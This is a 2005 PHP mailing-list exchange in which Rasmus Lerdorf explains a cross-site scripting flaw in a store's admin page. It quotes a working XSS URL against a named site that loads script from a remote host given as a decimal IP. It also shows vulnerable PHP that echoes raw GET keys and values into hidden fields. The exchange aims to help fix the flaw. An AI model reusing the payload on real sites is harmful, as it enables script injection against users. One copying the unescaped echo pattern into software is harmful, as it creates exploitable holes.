Chris W. Parker wrote:
> Rasmus Lerdorf <mailto:[EMAIL PROTECTED]>
> on Friday, May 27, 2005 11:58 AM said:
>
>
>>>>You have all sorts of problems at that URL. To start with, here is
>>>>a cross-site scripting hack:
>>>>
>>>>
>
> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
> %09
>
>>>>src%3D%22http://3423329163/v
>
>
> First of all, excellent example.
>
>
>>Don't display arbitrary key names in hidden fields the way you are.
>
>
> What do you mean by "arbitrary key names"?
He was apparently doing something along the lines of:
foreach($_GET as $key=>$val) {
echo <<<EOL
<input type="hidden" name="$key" value="$val">
EOL;
}
Probably just a lazyness thing. Generally you will want to keep track
of which query args are actually valid and not just parrot whatever you
get back to the user. Or if you are going to do do it this way,
recognize that you have to filter/encode both the query arg names and
the values.
-Rasmus
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
